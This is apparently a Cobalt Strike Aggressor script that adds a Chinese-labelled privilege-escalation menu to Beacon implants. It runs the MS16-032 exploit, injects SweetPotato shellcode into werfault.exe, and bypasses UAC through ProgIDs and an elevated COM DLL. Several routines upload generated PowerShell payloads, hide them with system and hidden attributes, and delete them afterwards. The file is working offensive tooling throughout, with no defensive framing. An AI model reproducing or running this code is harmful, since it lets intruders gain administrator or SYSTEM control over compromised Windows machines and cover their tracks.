sub ms16032{
    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via ms16-032");
    local('$Rch $payload $fname');
    @array = @("a", "b", "c", "d", "e", "f", "g", "1", "2", "3", "4", "5", "6");
    $total = 8;
    while($total >= 0){
        $fname = $fname.rand(@array);
        $total = $total - 1;
    }
    $fname = $fname.".cmd";
    $Rch = "x86";
    if (beacon_info($bid,"is64") == 1){
        $Rch = "x64";
    }
    $payload = powershell($3['listener'], false, $Rch);
    $handle = openf("> $+ $fname");
    writeb($handle, $payload);
    closef($handle);
    bupload!($bid, $fname);
    bshell!($bid, "attrib \" $+ $fname\" +s +h");
    bpowershell_import!($bid, script_resource("bin/ms16-032.ps1"));
    bpowershell!($bid, "Invoke-MS16-032  $+ $fname");
    exec("cmd.exe /C del /F ".$fname);
}
sub SweetPotato {
    local('$shellcode $arch $program $exe $parm');
    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via SweetPotato (ms16-075)", "T1068");
    if (-is64 $bid)
    {
        $arch = "x64";
    } else {
        $arch = "x86";
    }
    $program = "c:\\windows\\system32\\werfault.exe";
    $exe = script_resource("bin/sp.exe");
    $shellcode = base64_encode(artifact_payload($3['listener'], "raw", $arch));
    $parm = "-l 6363 "."-p $program "."-s $shellcode";
    bexecute_assembly!($bid, $exe, $parm);
    beacon_link($bid, $null, $3['listener']);
}
sub SweetPotato_Command {

    bexecute_assembly!($bid, script_resource("bin/sp-cmd.exe"), "-a $3['cmd']");

}
sub combypassuac_{
    btask($3['bid'], "Type: Elevated COM interface");
    btask($3['bid'], "Method: ICMLuaUtil");
    if (-is64 $3['bid']){
        blog($3['bid'], "The Beacon Arch:x64");
        $dllpath = script_resource("bin/combypass.x64.dll");
        bupload!($3['bid'], $dllpath);
        bshell($3['bid'], "rundll32 combypass.x64.dll,MyBypassUAC $3['executepath']");
        brm($3['bid'], "combypass.dll");
    }else{
        blog($3['bid'], "The Beacon Arch:x86");
        $dllpath = script_resource("bin/combypass.dll");
        bupload!($3['bid'], $dllpath);
        bshell($3['bid'], "rundll32 combypass.dll,MyBypassUAC $3['executepath']");
        brm($3['bid'], "combypass.dll");
    }

    
    
}
sub UacviaProgIDs{
    local('$type $bin $listener $arg $fname');
    $type = $3['type'];
    $bin = $3['path'];
    $listener = $3['listener'];
    $fname = Getname().".cmd";
    $rfname = "C:\\Users\\Public\\Documents\\".$fname;
    if($type eq "RunBin" && $bin ne ""){
        btask($bid, "Tasked Beacon to run Bypass UAC via ProgIDs");
        $arg = join(' ', @($bin));
        bexecute_assembly!($bid, script_resource("bin/ProgIDsUACBypass.exe"),$arg);
    }
    else if($type eq "Spawn" && $listener ne ""){
        btask($bid, "Tasked Beacon to run " . listener_describe($listener) . " Bypass UAC via ProgIDs");
        $payload = powershell($listener, false);
        bupload_raw!($bid,$rfname,$payload);
        $arg = join(' ', @($rfname));
        bexecute_assembly!($bid, script_resource("bin/ProgIDsUACBypass.exe"),$arg);
        bshell!($bid,"cmd.exe /C del /F ".$rfname);
    }
    else{
        show_error("Error");
    }
}


menu "提权"{
    item "MS16-032"{
            $bid = $1['@'];
            $Dialog = dialog("MS16-032",%(bid => $bid),&ms16032);
            dialog_description($Dialog, "The vulnerability could allow elevation of privilege if the Windows Secondary Logon Service fails to properly manage request handles in memory.");
            drow_listener($Dialog, "listener", "Listener: ");
            dbutton_action($Dialog, "Exploit");
            dialog_show($Dialog);
        }
     item "Sweet-Potato"{
            $bid = $1['@'];
            $Dialog = dialog("Sweet Potato",%(bid => $bid),&SweetPotato);
            dialog_description($Dialog, "The vulnerability could allow elevation of privilege.");
            drow_listener($Dialog, "listener", "Listener: ");
            dbutton_action($Dialog, "Exploit");
            dialog_show($Dialog);
        }
    item "Sweet-Potato-Command"{
            $bid = $1['@'];
            $Dialog = dialog("Sweet Potato Command",%(bid => $bid),&SweetPotato_Command);
            dialog_description($Dialog, "The vulnerability could allow elevation of privilege.");
            drow_text($Dialog, "cmd", "Command:");
            dbutton_action($Dialog, "Exploit");
            dialog_show($Dialog);
        }
    menu "UAC"{
        item "Bypass uac via ProgIDs"{
            $bid = $1['@'];
            $dialog = dialog("Bypass UAC via ProgIDs",%(bid => $bid, path => 'C:\\Windows\\System32\\notepad.exe'), &UacviaProgIDs);
            dialog_description($dialog, "Bypass UAC via ProgIDs.");
            drow_combobox($dialog,"type","Type: ", @("RunBin", "Spawn"));
            drow_text($dialog,"path","Bin path(type 1): ");
            drow_listener($dialog, "listener", "Listener(type 2): ");
            dbutton_action($dialog, "Go");
            dialog_show($dialog); 
        }
        item "&Elevated COM Bypassuc"{
            $bid = $1['@'];
            $dialog = dialog("COM DLL Bypassuc", %(executepath => "C:\\Windows\\System32\\cmd.exe", bid => $bid), &combypassuac_);
            dialog_description($dialog, "combypassuac #指定一个要运行的PE文件");
            drow_text($dialog, "executepath", "executepath:");
            dbutton_action($dialog, "run");
            dialog_show($dialog);
        }
    }
}